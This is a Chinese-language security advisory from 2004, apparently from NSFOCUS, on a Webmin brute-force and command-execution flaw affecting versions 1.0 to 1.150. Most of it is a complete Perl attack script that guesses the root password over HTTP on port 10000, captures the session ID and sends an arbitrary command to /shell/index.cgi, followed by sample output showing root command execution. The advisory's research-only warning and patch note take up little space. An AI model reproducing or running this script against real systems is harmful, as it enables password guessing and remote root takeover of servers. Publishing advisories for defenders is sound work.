安全研究
安全漏洞
Webmin暴力猜测任意命令执行漏洞
发布日期:2004-12-22
更新日期:2004-12-23
受影响系统:
Webmin Webmin 1.150描述:
Webmin Webmin 1.140
Webmin Webmin 1.130
Webmin Webmin 1.121
Webmin Webmin 1.110
Webmin Webmin 1.09
Webmin Webmin 1.08
Webmin Webmin 1.07
Webmin Webmin 1.06
Webmin Webmin 1.05
Webmin Webmin 1.02
Webmin Webmin 1.0
Webmin是一款基于WEB的Unix和Linux操作系统系统管理接口。
Webmin包含的index.cgi脚本存在安全问题,远程攻击者可以利用这个漏洞以进程权限执行任意命令。
Webmin允许暴力多次猜测帐户进行登录,并由于index.cgi对用户提交的参数缺少充分过滤,可导致以进程权限在系统上执行任意命令。
<*来源:Di42lo (DiAblo_2@012.net.il)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110375218504126&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/perl
##
# Webmin BruteForce + Command execution - By Di42lo <DiAblo_2@012.net.il>
#
# usage
# ./bruteforce.webmin.pl <host> <command>
#
#./bruteforce.webmin.pl 192.168.0.5 "uptime"
# [+] BruteForcing...
# [+] trying to enter with: admim
# [+] trying to enter with: admin
# [+] Found SID : f3231ff32849fa0c8c98487ba8c09dbb
# [+] Password : admin
# [+] Connecting to host once again
# [+] Connected.. Sending Buffer
# [+] Buffer sent...running command uptime
# root logged into Webmin 1.170 on linux (SuSE Linux 9.1)
# 10:55pm up 23 days 9:03, 1 user, load average: 0.20, 0.05, 0.01
use IO::Socket;
if (@ARGV<2){ print "Webmin BruteForcer\nusage:\n$0 <host> <command>\n"; exit; }
my $host=$ARGV[0];
my $cmd=$ARGV[1];
#start pass:
my $pass="a";
my $chk=0;
my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => \
"10000") || die "[-] Webmin on this host does not exist\r\n"; $sock->close;
print "[+] BruteForcing...\n";
my $sid;
while ($chk!=1) {
$pass++;
my $pass_line="page=%2F&user=root&pass=$pass";
my $buffer="POST /session_login.cgi HTTP/1.0\n".
"Host: $host:10000\n".
"Keep-Alive: 300\n".
"Connection: keep-alive\n".
"Referer: http://$host:10000/\n".
"Cookie: testing=1\n".
"Content-Type: application/x-www-form-urlencoded\n".
"Content-Length: __\n".
"\n".
$pass_line."\n\n";
my $line_size=length($pass_line);
$buffer=~s/__/$line_size/g;
my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => \
"10000"); if ($sock)
{
print "[+] trying to enter with: $pass\n";
print $sock $buffer;
while ($answer=<$sock>)
{
if ($answer=~/sid=(.*);/g)
{
$chk=1;
$sid=$1;
print "[+] Found SID : $sid\n";
print "[+] Password : $pass\n";
}
}
}
$sock->close;
}
print "[+] Connecting to host once again\n";
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => \
"10000") || die "[-] Cant Connect once again for command execution\n"; print "[+] \
Connected.. Sending Buffer\n"; my \
$temp="-----------------------------19777347561180971495777867604\n". \
"Content-Disposition: form-data; name=\"cmd\"\n". "\n".
"$cmd\n".
"-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"pwd\"\n".
"\n".
"/root\n".
"-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"history\"\n".
"\n".
"\n".
"-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"previous\"\n".
"\n".
"$cmd\n".
"-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"pcmd\"\n".
"\n".
"$cmd\n".
"-----------------------------19777347561180971495777867604--\n\n";
my $buffer_size=length($temp);
$buffer="POST /shell/index.cgi HTTP/1.1\n".
"Host: $host:10000\n".
"Keep-Alive: 300\n".
"Connection: keep-alive\n".
"Referer: http://$host:10000/shell/\n".
"Cookie: sid=$sid\; testing=1; x\n".
"Content-Type: multipart/form-data; \
boundary=---------------------------19777347561180971495777867604\n". \
"Content-Length: siz\n". "\n".
$temp;
$buffer=~s/siz/$buffer_size/g;
print $sock $buffer;
if ($sock)
{
print "[+] Buffer sent...running command $cmd\n";
print $sock $buffer;
while ($answer=<$sock>)
{
#print $answer;
if ($answer=~/defaultStatus="(.*)";/g) { print $1."\n";}
if ($answer=~/<td><pre><b>>/g)
{
$cmd_chk=1;
}
if ($cmd_chk==1)
{
if ($answer=~/<\/pre><\/td><\/tr>/g)
{
exit;
} else { print $answer; }
}
}
}
建议:
厂商补丁:
Webmin
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.webmin.com/webmin/
浏览次数:3436
严重程度:10(网友投票)
绿盟科技给您安全的保障